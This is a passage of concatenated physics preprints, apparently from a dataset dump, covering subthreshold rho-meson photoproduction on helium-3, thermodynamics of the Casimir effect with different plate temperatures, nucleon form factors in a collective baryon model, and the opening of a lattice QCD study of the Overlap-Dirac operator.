means sufficient to account for a mass lowering of the order
explicitly observed in the experiment. This is manifest, for example,
in comparing the lower solid curves of Figs.~\ref{fig840}a,d - for
which $\rho^0$ production is dominated by the $ppn$ final state - with
the $J$=1 fingerprint of the $\rho^0$ in Fig.~\ref{figcos}. The loci
of the former curves, consistent with the mass distribution indicated
by the histogram of Fig.~\ref{figims}a for E$_\gamma$=840 MeV and the
nominal $\rho^0$ mass, are far too high to be compatible with
Fig.~\ref{figcos}, with a $\rho^0$ signal peaking in the range of
500-600 MeV/c$^2$. In contrast, the histogram of Fig.~\ref{figims}b
for a lowered $\rho^0$ mass, and the dashed curve in
Fig~\ref{fig840}a, are consistent.
Alternate fits were also attempted, to possibly discern additional
features from the 840 and 920 MeV bin samples. Decoupling the
exclusive ${^3}He$ from the breakup $ppn$ final states with respect to
m$^*_{\rho^0}$ yielded identical masses for the 920~MeV bin, and a
somewhat smaller mass for the latter relative to the former channel
for the 840~MeV bin. The resulting improvement in the quality of fit,
however, is within the uncertainty estimate of $\sigma_{\chi^2}$. Fits
were also performed with $\Gamma^*_{\rho^0}$ fixed to the predicted
width at half nuclear density extracted for ${^3}He$ from
Ref.~\cite{weise}, about double the free width $\Gamma_{\rho^0}$. A
sizeable improvement in $\chi^2$ was noted with the modified width for
any mass, compared with the free mass and width case. In all cases,
however, the $\chi^2$ is 5-10\% larger with $\Gamma^*_{\rho^0}$ than
with $\Gamma_{\rho^0}$. Moreover, the preferred m$^*_{\rho^0}$ is no
higher with the modified than with the free width. In summary, these
exploratory fits verify the preference in a reduced $\rho^0$ mass, but
are inconclusive, within the sensitivity of the data, as to whether a
width modification is {\it in addition} supported.
The absence of a conclusive $\rho^0$ mass-modification dependence from
the 1000 and 1080 MeV bins, in contrast to the strong signal from the
840 and 920 MeV bins, is telling as well. Whereas the former are more
prone to probing the exclusive channel, and therefore the nuclear
mean-field medium effect, the latter are deeper into the subthreshold
region, dominated by the breakup channel, and probe distances
shorter than the nucleonic radius. To illustrate the range of the
$\rho^0$ processes in different energy regions, we consider the mean
decay length $l_0$ of the $\rho^0$
\begin{eqnarray}
&&l_0 = \beta t_0={{p\hbar}\over{m_{\rho^0}\Gamma_{\rho^0}c}}\nonumber \\
&&\beta = {p\over{m_{\rho^0}\gamma c}}\nonumber \\
&&t_0 = \gamma \tau_0 = \gamma {\hbar\over\Gamma_{\rho^0}}\ ,
\label{dl0}
\end{eqnarray}
with the nominal mass $m_{\rho^0}$ and width $\Gamma_{\rho^0}$ for the
$\rho^0$ meson, in the rest frame of either the interacting nucleon,
or the ${^3H}e$ nucleus, for the breakup or bound final state
(Fig.~\ref{figdl0}). At low photon energies (e.g. E$_\gamma$=840 MeV,
Fig.~\ref{figdl0}a) the $ppn$ channel dominates $\rho^0$
photoproduction. This is verified by the fact that the low
missing-mass selected data represent less than 10\% of the total
unselected events, whereas the high missing-mass selected data
contribute the great majority of the $\rho^0$ events and their
corresponding distributions are generally consistent with the full
(unselected) data. With the $\rho^0$ mesons produced on the nucleon,
and a mean decay length of under $0.5$ fm for a substantial portion of
them, there is a large overlap of the volume traversed before their
decay and the nucleonic volume. To the extent that the medium
modifications of the vector-meson properties depend on the density of
the surrounding nuclear matter, it is conceivable that the induced
medium effect be dominated by the large densities encountered in the
interior of the nucleon, and consequently be far more pronounced than
a medium effect induced by nuclear fringe densities. At higher photon
energies (e.g. E$_\gamma$=1 GeV, Fig.~\ref{figdl0}b), both the $ppn$
and ${^3H}e$ final states contribute and the mean decay length
increases. Whereas nucleonic densities become increasingly
inaccessible, a large overlap of the volume traversed by the $\rho^0$
before its decay with the ${^3H}e$ nucleus may still induce a weaker
nuclear medium effect. Moreover, the possibility of a medium-induced
increase in the width $\Gamma_{\rho^0}$ is in favor of shorter decay
lengths (Eq.~\ref{dl0}), and therefore further increases the
likelihood of accessing regions of large densities either in the
nucleon, or the nuclear core. The present results may therefore be
suggestive of a moderate medium effect in the realm of the nuclear
mean field at near-threshold photon energies, probing normal nuclear
densities, turning to a drastic reduction of the $\rho^0$ mass in the
deep subthreshold region, where the $\rho^0$ decay may be induced in
the proximity of the nucleon. These implications, however, need to be
further investigated and verified by higher precision and large solid
angle experiments \cite{sp}.
\section{Conclusions}
\label{sec:concl}
In summary, the kinematics and final state of the
${^3}He$($\gamma$,$\pi^+\pi^-$)X reaction have been studied with the
TAGX spectrometer and a tagged photon beam in the subthreshold
$\rho^0$ photoproduction region. The bound ${^3H}$e and breakup $ppn$
components of the $\rho^0$ channel have been investigated, aiming at
the distinction between a nuclear and a possible nucleonic medium
effect on the $\rho^0$ mass. The $\rho^0$ channel has been aided by
the inherent selectivity of the TAGX spectrometer to coplanar
$\pi^+\pi^-$ events, and by the choice of ${^3}He$ as a target with
minimal FSI effects without suppression of the $\rho^0$ amplitude. In
any case, the size of target has little effect in the subthreshold
region. The $J=1$ fingerprint of the $\rho^0$ has been observed in the
dipion invariant mass region 500-700 MeV/c$^2$, pointing to a
substantial reduction beyond a trivial phase-space governed apparent
lowering. This has been verified by MC simulations, incorporating the
exclusive and breakup $\rho^0$ channels, the latter both with and
without FSI, as well as background hadronic channels and s-wave
correlations. The extracted $\rho^0$ medium-modified masses,
642$\pm$40 MeV/c$^2$, 669$\pm$32 MeV/c$^2$, and 682$\pm$56 MeV/c$^2$
for the 840, 920, and 1000 MeV data bins, suggest a strong medium
effect in the deep subthreshold region, requiring large densities that
are incompatible with a nucleus as light as ${^3H}e$, but that are
more consistent with the probing of the nucleonic volume. The pattern
of decreasing sensitivity with increasing photon energy, with the 1080
MeV bin showing no evidence of a $\rho^0$ mass-modification signal,
hints a moderate mean-field nuclear effect at near-threshold
energies. The simulations are inconclusive regarding a medium-modified
$\rho^0$ width.
Further analysis currently in progress for photoproduction on heavier
targets (${^4}He$,${^{12}}C$) and for background contributions
(e.g. the $\Delta\pi$ channel) from TAGX experiments, as well as
future experiments planned for TJNAF \cite{sp}, may more accurately
isolate the $\rho^0 \rightarrow \pi^+\pi^-$ channel from the
background processes, and shed light on the nature of the medium
modifications on light vector-meson properties at the interface of
hadronic and quark matter.
The authors wish to thank H. Okuno and the staff of INS-ES for their
considerable help with the experiment. Furthermore, the authors
acknowledge the very insightful discussions with P. Guichon, M.
Ericson, A. Thomas, and A. Williams during the Workshop on Hadrons in
Dense Matter (Adelaide, March 10-28, 1997), as well as the discussions
with N. Isgur at Jefferson Lab. This work has been partially
supported by grants from INS-ES, INFN/Lecce, NSERC, and UFF/GWU.
| 2024-02-18T23:40:14.567Z | 1998-11-23T11:23:03.000Z | algebraic_stack_train_0000 | 1,788 | 11,571 |
|
proofpile-arXiv_065-8729 | \section{Introduction}
\noindent
The Casimir effect \cite{CAS} is one of the fundamental effects
of Quantum Field Theory. It tests the importance of the zero point
energy. In principle, one considers two conducting infinitely
extended parallel plates at the positions $x_3=0$ and $x_3= a$.
These conducting plates change the vacuum energy of Quantum
Electrodynamics in such a way that a measurable attractive
force between both plates can be observed
\cite{EXP}. This situation does not essentially change, if
a nonvanishing temperature \cite{MF} is taken into account.
The thermodynamics
of the Casimir effect \cite{BML} \cite{GREIN}
and related problems
\cite{BARTO}
is well investigated.\\
Here we shall treat the different regions separately.
We assume a temperature $T$ for the space between
the plates and a temperature $ T' $ for the space outside the plates.
Thereby we consider the right plate at $ x_3=a $ as movable, so
that different thermodynamic processes such as isothermal or
isentropic motions, can be studied.
At first we investigate the thermodynamics of the space between
the two plates by setting $T'=0$. This can be viewed as the black
body radiation
(BBR) for a special geometry. The surprising effect is, that for
vanishing distance ($a\rightarrow 0$) in isentropic processes
the temperature approaches a finite value, which is completely
determined by the fixed entropy. This is in contrast to the
expected behaviou of the standard BBR, if the
known expression derived for a large volume is extrapolated
to a small volume.
For large values of $a$ the BBR takes the standard form.
As a next topic we consider the Casimir pressure assuming
that the two physical regions, i.e. the spaces between and
outside the two plates possess different temperatures.
Depending on the choices of $T$ and $T'$
a different
physical behaviour is possible.
For $T'<T$ the external pressure is reduced in comparison with the
standard case $T'=T$. Therefore we expect the existence of
an equilibrium point, where the pure Casimir
attraction ($T=0$ effect ) and the
differences of the radiation pressures compensate each other.
This point is unstable, so that for isothermal processes
the movable plate moves either to
$a\rightarrow 0$ or to $a \rightarrow \infty$. However, an
isentropic motion reduces the internal radiation pressure
for growing distances, so that in this case
there is an additional stable equilibrium point.
\section{Thermodynamic Functions}
The thermodynamic functions are already determined by different
methods \cite{MF} \cite{BML}. We recalculate them by
statistical mechanics including the zero-point energy and cast
it in a simpler form which can be studied in detail \cite{MR}.
For technical reasons the
system is embedded in a large cube (side L). As space between the
plates
we consider the volume $L^2a$, the region outside is given by
$L^2(L-a)$. All extensive thermodynamic functions are defined per area.
\\
Free energy $\phi = F/L^2$:
\begin{eqnarray}
\label{1}
\phi_{int} &=& [\frac{\hbar c \pi^2}{a^4}(-\frac{1}{720} + g(v))
+\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4} ]a ,\\
\label{2}
\phi_{ext} &=& [\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4}
-\frac{\hbar c \pi^6}{45}(\frac{v'}{a})^4](L-a).
\end{eqnarray}
Energy $e = E/L^2$:
\begin{eqnarray*}
e_{int} &=& [\frac{\hbar c \pi^2}{a^4}(-\frac{1}{720} + g(v)
-v \partial_v g(v))
+\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4} ]a ,\\
e_{ext} &=& [\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4}
+\frac{3 \hbar c \pi^6}{45}(\frac{v'}{a})^4](L-a).
\end{eqnarray*}
Pressure:
\begin{eqnarray}
\label{3}
p_{int} &=& [\frac{\hbar c \pi^2}{a^4}(-\frac{1}{240} + 3g(v)
-v\partial_v g(v))
-\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4} ],\\
\label{4}
p_{ext} &=& [\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4}
-\frac{\hbar c \pi^6}{45}(\frac{v'}{a})^4].
\end{eqnarray}
Entropy $\sigma = S/(k L^2)$:
\begin{eqnarray}
\label{5}
\sigma_{int} = -\frac{ \pi}{a^3} \partial_v g(v) a;\;\;\,
\sigma_{ext} = \frac{4\pi^5}{45} (\frac{v'}{a})^3 (L-a),
\end{eqnarray}
$\lambda$ regularizes ($\lambda \rightarrow 0 $)
the contributions from the zero-point
energy. The thermodynamics is governed by the function $g(v)$.
We list two equivalent expressions:
\begin{eqnarray}
\label{6}
g(v) = -v^3[\frac{1}{2}\zeta (3) + k(\frac{1}{v})] =
\frac{1}{720} -\frac{\pi^4}{45}v^4 -
\frac{v}{4\pi^2}[\frac{1}{2} \zeta(3) + k(4\pi^2 v)].
\end{eqnarray}
The function $k(x)$ is given by
\begin{eqnarray}
\label{7}
k(x) = (1- x\partial_x)\sum_{n=1}^{\infty}
\frac{1}{n^3}\frac{1}{exp(nx) - 1}.
\end{eqnarray}
It is strongly damped for large arguments. $v$ is the known variable
$v = a T k/(\hbar \pi c)$, the variable $v'$ contains
the temperature $T'$ instead of $T$.
\section{Black Body Radiation}
\noindent
As a first topic we consider the space between the two plates as
a generalization of the usual black body radiation (BBR) for a
special geometry $L \times L \times a $. Contrary to the
standard treatment we include here both, the internal and
external the zero point energy.
Thereby parameter-dependent divergent contributions compensate
each other, whereas the physically irrelevant
term $ ~ L/{\lambda^4}$ can be omitted \cite{MR}.
If we approximate the function $g$ for large $v$
by $g \simeq {1}/{720} - (\pi^4/45) v^4
- \zeta(3)/(8\pi^4) v $, we obtain
\begin{eqnarray}
\label{8}
\phi_{as} &=& \frac{\pi^2 \hbar c}{a^3}[-\frac{\pi^4}{45}v^4
-\frac{\zeta(3) }{8\pi^2} v],\;\;\;
\sigma_{as} = \frac{\pi}{a^2} [\frac{4\pi^4}{45}v^3
+\frac{\zeta(3) }{8\pi^2} ],\\
\label{9}
p_{as}&=& \frac{\pi^2 \hbar c}{a^4} [\frac{\pi^4}{45}v^4
-\frac{\zeta(3) }{8\pi^2} v],\;\;\;\
e_{as}= \frac{\pi^2 \hbar c}{a^3} \frac{3\pi^4}{45}v^4.
\end{eqnarray}
These expressions contain the large-volume
contributions
corresponding to the standard BBR (first term)
and corrections.
In the other limit of small $v$,
we have to use $g(v) = - v^3 \zeta(3)/2 $ and get
\begin{eqnarray}
\label{10}
\phi_{o} &=& \frac{\pi^2 \hbar c}{a^3}[-\frac{1}{720}
-\frac{\zeta(3) }{2} v^3],\;\;\;
\sigma_{o} = \frac{\pi}{a^2}
\frac{3 \zeta(3) }{2} v^2, \\
\label{11}
p_{o}&=& \frac{\pi^2 \hbar c}{a^4} [-\frac{1}{240}],\;\;\;\
e_{o}= \frac{\pi^2 \hbar c}{a^3} [-\frac{1}{720}
+\zeta(3) v^3].
\end{eqnarray}
In this case the contributions of the zero point energy
dominate. It is known that nondegenerate vacuum states
do not contribute to the entropy, which indeed vanishes at
$T=0$.\\
Let us now consider isentropic processes. This means
that we fix the values of the entropy for the internal
region (\ref{5}) during the complete process.
Technically we
express this fixed value according to
the value of the variable $v$ either through the approximation
(\ref{8}) or (\ref{10}).
Large distances
and/or
high temperatures lead to large values of $v$ so we have to
use $\sigma_{as}$. Constant entropy means
\begin{eqnarray}
\label{12}
\sigma = {\rm const.} =
\sigma_{as} = \frac{4\pi^2k^3}{45(\hbar c)^3} a T^3
+\frac{\zeta(3)}{8\pi} \frac{1}{a^2 }.
\end{eqnarray}
Asymptotically this is the standard relation
BBR $S = L^2 \sigma_{as}
= {\rm const.} \times V T^3 $, here valid for large $T $ and
$V$. If we now consider smaller values of $a$, then, because of
eq.(\ref{5}),
also $-\partial_v g(v)$
takes smaller values. It is possible to prove \cite{MR}
the inequalities
$ g <0 $, $ \partial_v g(v) <0 $ and $ (\partial_v)^2 g(v) <0 $.
This monotonic behaviour of $\partial_v g(v)$ leads to the
conclusion that also the corresponding values of $v$ become
smaller. Consequently, we have to apply the
other represention (\ref{10}) for small $v$
and obtain
\begin{eqnarray}
\label{13}
\sigma =\sigma_{as}=\sigma_{o}
=\frac{k^2}{\hbar^2 c^2 \pi}
\frac{3 \zeta(3) }{2} T^2.
\end{eqnarray}
This means that for $ a \rightarrow 0 $ the temperature
does not tend to infinity, but approaches the finite value
\begin{eqnarray}
\label{14}
T = \left(\sigma \,\, 2 \hbar^2 c^2 \pi/(3 \zeta(3) k^2)
\right)^{1/2}.
\end{eqnarray}
This is in contrast to the expectation: if we apply the
standard expression of BBR, fixed entropy implies
$VT^3 = {\rm const.} $, so that the temperature tends to
infinity for vanishing volume.
However this standard expression for BBR,
derived for a continuous frequency spectrum, is not valid
for small distances. The reduction of the degrees of freedom,
i.e. the transition from a continuous frequency spectrum to
a discrete spectrum, is the reason for our result.
\section{Equilibrium Points of the Casimir Pressure}
\noindent
The Casimir pressure results from the contributions of
the internal and the external regions acting on the right
movable plate.
\begin{eqnarray}
\label{15}
P(a,T,T') = P_{ext}(T') + P_{int}(a,T)
= \frac{\pi^2 \hbar c}{a^4}p(v)
+\frac{\pi^2 k^4}{45 (\hbar c)^3}(T^4 - {T'}^4),
\end{eqnarray}
where
\begin{eqnarray}
p(v) = -\frac{1}{4\pi^2} v[\zeta(3) +(2 - v\partial_v)k(4\pi^2v)]
=-\frac{1}{240} +3g(v) - v\partial_{v}g(v)
-\frac{\pi^4}{45} v^4.\nonumber
\end{eqnarray}
Usually one considers the case $T=T'$, so that the Casimir
pressure is prescribed by $p(v)$ alone.
It is known, that
$P(a,T,T'=T)$ is a negative but monotonically rising function
from $-\infty$ (for $ a\rightarrow 0 $) to $ \; 0\; $ (for
$a\rightarrow \infty $).
It is clear, that the addition of a positive pressure
$ \frac{\pi^2 k^4}{(\hbar c)^3}(T^4 - {T'}^4) $ for $T>T'$
stops the Casimir attraction at a finite value of $ v$.
The question is whether this equilibrium point may be
stable or not? The answer
follows from the monotonically rising behaviour of the standard
Casimir pressure.
\begin{eqnarray}
\label{16}
\frac{d}{da}P(a,T,T') =\frac{d}{da}P(a,T,T'=T) >0.
\end{eqnarray}
Consequently this equilibrium point is unstable
(see also \cite{MR}). \\
Next we consider the space between the two plates not for fixed
temperature but as a thermodynamically closed system with
fixed entropy. In the
external region we assume again a fixed
temperature $T'$.
To solve this problem in principle, it is sufficient to discuss
our system for large $v$ (as large $v$ we mean such
values of $v$ for which the asymptotic approximations (\ref{8}),
(\ref{9}) are valid; this region starts at
$ v> 0.2 $ ).
Using our asymptotic
formulae (\ref{8}),(\ref{9}) we write the Casimir pressure
as
\begin{eqnarray}
\label{17}
P(a,v,T') = \frac{\pi^2 \hbar c}{a^4}[\frac{\pi^4}{45}v^4
-\frac{\zeta(3)}{4\pi^2 }v
- \frac{\pi^4}{45}{v'}^4 ],
\end{eqnarray}
with $v' = aT' k/(\hbar c \pi)$ where $v$ has to be determined
from the condition $ \sigma_{as}=\sigma = {\rm const.} $ or
\begin{eqnarray}
\label{18}
\pi v^3 = [ a^2 \sigma - \zeta(3)/(8\pi^2)] 45/(4\pi^4).
\end{eqnarray}
Then we may write
\begin{eqnarray}
\label{19}
P(a,v,T') = \frac{\pi^2 \hbar c}{a^4}[\frac{\sigma a^2}
{4\pi} -\frac{9\zeta(3)}{32\pi^2 }]
\{\frac{45}{4\pi^4}(\frac{\sigma a^2}{4\pi}
- \frac{\zeta(3)}{8\pi^2}) \}^{3/2}
-\frac{\pi^2 \hbar c}{a^4} \frac{\pi^4}{45}{v'}^4.
\end{eqnarray}
At first we consider the case $T'=0$.
We look for the possible
equilibrium points $P(a,v,T'=0) =0$. The result is
$ v^3 = 45\zeta(3)/(4 \pi^6)$. This corresponds to $v=0.24$.
For this value of $v$ the used approximation is not very good, but
acceptable.
A complete numerical estimate \cite{MR} gives the same value.
Now we express the temperature $ T$ included in $v$ with the
help of the equation for isentropic motions
(\ref{18}) and obtain
$ a^2 = 9\zeta(3)/(8 \pi \sigma)$.
The instabiliy of this point can be directly seen by looking
at
\begin{eqnarray}
\label{20}
\frac{d}{da}P(a,T,T'=0) &=& - 4 P(a,T,T'=0)
+ \frac{\pi^2 \hbar c}{a^4}
[\frac{4 \pi^4}{45}v^3
-\frac{\zeta(3)}{8\pi^2 }]
(\frac{dv}{da })_{\sigma} |_{P=0} \nonumber\\
&= & \frac{\pi^2 \hbar c}{a^4}\frac{3\zeta(3)}{4\pi^2}
(\frac{dv}{da })_{\sigma}.
\end{eqnarray}
It is intuitively clear that
$(\frac{dv}{da })_{\sigma}$ is positive; an explicit proof
is given in \cite{MR}.
So it is clear, that this point is unstable
as in the isothermal case. If we consider, in
eq.(\ref{17}), the variable $v= aTk/(\hbar c \pi) $ at
fixed $T$, there is no further equilibrium point.
This result for isothermal processes is, however, not
valid for isentropic processes. In this case we obtain
according to eq.(\ref{19}) a second trivial equilibrium point
at $a \rightarrow \infty $ for vanishing external temperature
($v'=0$).
Between both zeroes we have one maximum. So we conlude:
For isentropic processes there must be
two equilibrium points; the left one is unstable, the
right one at $ a \rightarrow \infty $ corresponds to a
vanishing derivative. If we now
add a not too high external pressure with the help of an external
temperature $T'$, then this second equilibrium point
- present for isentropic processes - becomes stable.
So, in principle we may observe oscillations
at the position of the second equilibrium point.
\section*{Acknowledgments}
We would like to thank C. B. Lang and N. Pucker
for their constant support and K. Scharnhorst, G. Barton and
P. Kocevar for discussions on the present topic.
\section*{References}
| 2024-02-18T23:40:14.605Z | 1998-11-14T17:35:47.000Z | algebraic_stack_train_0000 | 1,790 | 2,352 |
|
proofpile-arXiv_065-8731 | \section{Introduction}
Electromagnetic form factors of the nucleon and its
excitations (baryon resonances) provide a powerful tool
to investigate the structure of the nucleon.
These form factors can be measured in electroproduction
as a function of the four-momentum squared $q^2=-Q^2$ of the virtual
photon.
In this contribution we present a simultaneous study of the elastic
form factors of the nucleon and the transition form factors,
for both of which there exists exciting new data \cite{newdata}.
The analysis is carried out in the framework of a collective model of
the nucleon \cite{BIL}. We address the effects of relativistic
corrections and couplings to the meson cloud.
\section{Collective model of baryons}
In the recently introduced collective model of baryons \cite{BIL}
the radial excitations of the nucleon are described as vibrational
and rotational excitations of an oblate top.
The electromagnetic form factors are obtained by folding with a
distribution of the charge and magnetization over the entire volume
of the baryon. All calculations are carried out in the Breit frame.
\subsection{Elastic form factors}
In the collective model, the electric and magnetic form factors
of the nucleon are expressed in terms of a common intrinsic
dipole form factor \cite{BIL}.
The effects of the meson cloud surrounding the nucleon are taken into
account by coupling the nucleon form factors to the isoscalar vector
mesons $\omega$ and $\phi$ and the isovector vector meson $\rho$.
The coupling is carried out at the level of the Sachs form factors.
The large width of the $\rho$ meson is taken into account according
to the prescription of \cite{IJL}, and the constraints from
perturbative QCD are imposed by scaling $Q^2$ with the strong
coupling constant \cite{GK}.
We carried out a simultaneous fit to all four electromagnetic form
factors of the nucleon and the nucleon charge radii, and found good
agreement with the world data, including the new data for the neutron
form factors (square boxes in Fig.~\ref{gempn}). The oscillations
around the dipole values are due to the meson cloud couplings.
\begin{figure}
\vfill
\begin{minipage}{.5\linewidth}
\centerline{\epsfig{file=b98_fig1a.ps,width=\linewidth,angle=-90}}
\end{minipage}\hfill
\begin{minipage}{.5\linewidth}
\centerline{\epsfig{file=b98_fig1b.ps,width=\linewidth,angle=-90}}
\end{minipage}
\vspace{1pt}
\begin{minipage}{.5\linewidth}
\centerline{\epsfig{file=b98_fig1c.ps,width=\linewidth,angle=-90}}
\end{minipage}\hfill
\begin{minipage}{.5\linewidth}
\centerline{\epsfig{file=b98_fig1d.ps,width=\linewidth,angle=-90}}
\end{minipage}
\caption[]{Nucleon form factors as a function of $Q^2$ (GeV/c)$^2$:
a) $G_E^p/F_D$ from \protect\cite{gemp},
b) $G_M^p/\mu_p F_D$ from \protect\cite{gemp},
c) $G_E^n$ from \protect\cite{gen} and
d) $G_M^n/\mu_n F_D$ from \protect\cite{gmn};
IJL from \protect\cite{IJL} and GK from \protect\cite{GK};
$F_D=1/(1+Q^2/0.71)^2$~.}
\label{gempn}
\end{figure}
\subsection{Transition form factors}
Recent experiments on eta-photoproduction have yielded valuable
new information on the helicity amplitudes of the N(1520)$D_{13}$
and N(1535)$S_{11}$ resonances.
In Table~\ref{ratios} we show the model-independent ratios of
photocouplings that have been extracted from the new data
\cite{Nimai1,Nimai2}.
These values are in excellent agreement with those of the collective
model \cite{BIL}. In the last column we show the effect of relativistic
corrections to the electromagnetic transition operator.
In Fig.~\ref{n1535} we show the N(1535)$S_{11}$ proton helicity
amplitude. The new data are indicated by diamonds and square boxes.
The effect of relativistic corrections (dashed line) to the
nonrelativistic results (solid line) in the collective model
of \cite{BIL} is small, and shows up mainly at small values of $Q^2$.
\begin{figure}[ht]
\centering
\psfig{figure=b98_fig2.ps,height=7cm,width=10cm,angle=-90}
\caption[]{N(1535)$S_{11}$ proton helicity amplitude in
$10^{-3}$ GeV$^{-1/2}$ as a function of $Q^2$ (GeV/c)$^2$.
A factor of $+i$ is suppressed. The data are taken from \cite{s11}.}
\label{n1535}
\end{figure}
\begin{table}
\centering
\caption[]{Ratios of helicity amplitudes.}
\label{helamp}
\vspace{15pt}
\begin{tabular}{lllll}
\hline
& & & & \\
N(1535)$S_{11}$ & $A^n_{1/2}/A^p_{1/2}$
& --0.84 $\pm$ 0.15 \cite{Nimai1} & --0.81 \cite{BIL} & --0.90 \\
N(1520)$D_{13}$ & $A^p_{3/2}/A^p_{1/2}$
& --2.5 $\pm$ 0.2 $\pm$ 0.4 \cite{Nimai2}
& --2.53 \cite{BIL} & --2.66 \\
& & & & \\
\hline
\end{tabular}
\label{ratios}
\end{table}
\section{Summary and conclusions}
We presented a simultaneous analysis of the four elastic
form factors of the nucleon and the transition form factors
in a collective model of baryons, and found
good agreement with the new data presented at this conference.
The deviations of the nucleon form factors from the dipole
form were attributed to couplings to the meson cloud
which were taking into account using vector meson dominance.
The helicity amplitudes of the N(1520)$D_{13}$ and N(1535)$S_{11}$
resonances as well as their model-independent ratios are reproduced
well. The effect of relativistic corrections is small, and shows up
mainly at small values of $Q^2$.
In conclusion, the present analysis of electromagnetic
couplings shows that the collective model of baryons
provides a good overall description of the available data.
\section*{Acknowledgements}
This work is supported in part by DGAPA-UNAM under project IN101997
and by grant No. 94-00059 from the United States-Israel Binational Science
Foundation (BSF).
\section*{References}
| 2024-02-18T23:40:14.606Z | 1998-11-03T21:06:32.000Z | algebraic_stack_train_0000 | 1,792 | 917 |
|
proofpile-arXiv_065-8772 | \section{Introduction}
\label{sec:intro}
The Overlap-Dirac operator~\cite{Herbert1} derived from the overlap
formalism for chiral fermions on the lattice~\cite{over} provides a
non-perturbative regularization of chiral fermions coupled vectorially
to a gauge field. The massless Overlap-Dirac operator is given by (the
lattice spacing is set to one)
\begin{equation}
D(0)={1\over 2} \left[1 + \gamma_5\hat H_a \right].
\label{eq:D0}
\end{equation}
$\hat H_a$ is a hermitian operator that depends on the background gauge field
and has eigenvalues equal to $\pm 1$. There are two sets of choices for
$\hat H_a$. The simplest example in the first set is $\epsilon(H_w)$
where $\gamma_5 H_w(-m)$ ($m_c < m < 2$)
is the usual Wilson-Dirac operator on the
lattice with a negative fermion mass~\cite{Herbert1} and $-m_c$ is the
critical mass, which goes to zero in the continuum limit. One could replace
$H_w$ by any improvements of the Wilson-Dirac operator with the mass in the
supercritical region but smaller than where the doublers become light.
The simplest example in the other set is obtained from the domain wall
formalism~\cite{kaplan} and $\hat H_a=\epsilon(\log(T_w))$ where $T_w(m)$ is
the transfer matrix associated with the propagation of the four
dimensional Wilson fermion in the extra
direction~\cite{Herbert3}. Here $m_c < m < 2$ is the domain wall mass.
Again, one can replace the five dimensional Wilson-Dirac fermion
by any improvements.
The massive Overlap-Dirac operator
is given by
\begin{equation}
D(\mu)={1\over 2} \left[1+\mu + (1-\mu) \gamma_5\hat H_a \right]
\label{eq:Dmu}
\end{equation}
with $0\le\mu\le 1$ describing fermions with positive mass all the way from
zero to infinity. For small $\mu$, $\mu$ is proportional to the fermion mass.
When $\hat H_a = \epsilon (\log(T_w))$, the bare mass $\mu$ is exactly the
standard mass term in the domain wall formalism~\cite{Shamir,Herbert3}.
The analytical expressions derived in this paper
are valid for any generic choice of $\hat H_a$.
Our numerical results are obtained with the choice of $\hat H_a =\epsilon(H_w)$.
The massless Overlap-Dirac operator has exact zero eigenvalues, due to
topology, in topologically non-trivial gauge fields, and these zero
eigenvalues are always paired with eigenvalues exactly equal to
unity~\cite{Herbert1,EHN}. All exact zero eigenvalues are chiral, and
their partners at unity are also chiral but with opposite
chirality. The rest of the eigenvalues of the Overlap-Dirac operator
come in complex conjugate pairs and one eigenvector is obtained by the
operation of $\gamma_5$ on the other eigenvector. The behavior of the
Overlap-Dirac operator on the lattice is essentially that of a
continuum massless fermion.
The external fermion propagator is given by
\begin{equation}
{\tilde D}^{-1}(\mu)=(1-\mu)^{-1}\left[D^{-1}(\mu) -1\right]~.
\end{equation}
The subtraction at $\mu=0$ is evident from the original overlap
formalism~\cite{over} and the massless propagator anti-commutes with
$\gamma_5$~\cite{Herbert1,Herbert2}. With our choice of subtraction
and overall normalization the propagator satisfies the relation
\begin{equation}
\mu \langle b^\dagger | \Bigl[ \gamma_5{\tilde D}^{-1}(\mu) \Bigr]^2
| b \rangle
= \langle b^\dagger | {\tilde D}^{-1}(\mu) | b \rangle
\ \ \ \ \forall \ \ b \ \ \ {\rm satisfying} \ \ \
\gamma_5 | b \rangle= \pm | b\rangle
\label{eq:Goldstone}
\end{equation}
for all values of $\mu$ in an arbitrary gauge field background. This
relation will be evident from the discussion in
section~\ref{sec:chiral_cond}. The fermion propagator on the lattice
is related to the continuum propagator by
\begin{equation}
D_c^{-1} (m_q) = Z^{-1}_\psi {\tilde D}^{-1}(\mu)
\qquad {\rm with} \quad m_q = Z_m^{-1} \mu
\end{equation}
where $Z_m$ and $Z_\psi$ are the mass and wavefunction renormalizations,
respectively. Requiring that (\ref{eq:Goldstone}) hold in the continuum,
results in $Z_\psi Z_m =1$. For
$\hat H_a =\epsilon(H_w(m))$ we find
\begin{equation}
Z_\psi = Z_m^{-1} = 2m
\end{equation}
at tree level, and
a tadpole improved estimate gives
\begin{equation}
Z_\psi = Z_m^{-1} = {2 \over u_0} \left[ m - 4 (1 - u_0) \right] ~,
\end{equation}
where $u_0$ is one's favorite choice for the tadpole link value. Most
consistently, for the above relation, it is obtained from $m_c$, the
critical mass of usual Wilson fermion spectroscopy.
In this paper, we study QCD in the quenched limit on the lattice using
the Overlap-Dirac operator. Our aim is to study the behavior of chiral
susceptibilities on a finite lattice in the massless limit. In
section~\ref{sec:chiral_cond}, we derive analytic expressions for
various chiral susceptibilities using the spectral decomposition of
the Overlap-Dirac operator. These formulae do not reveal any new
physics not already known from formal arguments in the continuum;
however, they are valid for any lattice spacing, not only in the
continuum limit. These formulae will help us simplify the numerical
computations and disentangle contributions due to global topology from
the rest of the contributions. We also discuss the massless limit of
the chiral susceptibilities in quenched QCD. In
section~\ref{sec:details}, we present some details of the algorithm
used to numerically compute the chiral susceptibilities on a finite
lattice. Our numerical results are presented in
section~\ref{sec:results} and compared with the analytical expressions
obtained in section~\ref{sec:chiral_cond}. Similar numerical work has
been done recently using domain wall fermions with a finite extent in
the fifth direction~\cite{Col_lat98}.
\section{Chiral condensate and susceptibilities}
\label{sec:chiral_cond}
An analysis of the Overlap-Dirac operator can be performed in an
arbitrary gauge field background by noting that $\hat H_a$ can be
written in block diagonal form with $2\times 2$ blocks in the chiral
basis~\cite{EHN}. We start by recalling a few properties of the
Overlap-Dirac operator $D$ for a single Dirac fermion: $(\gamma_5 D)^2$
commutes with $\gamma_5$ and both operators can therefore be
diagonalized simultaneously. The massive Overlap-Dirac operator can be
related to the massless one, from (\ref{eq:Dmu}), as
\begin{equation}
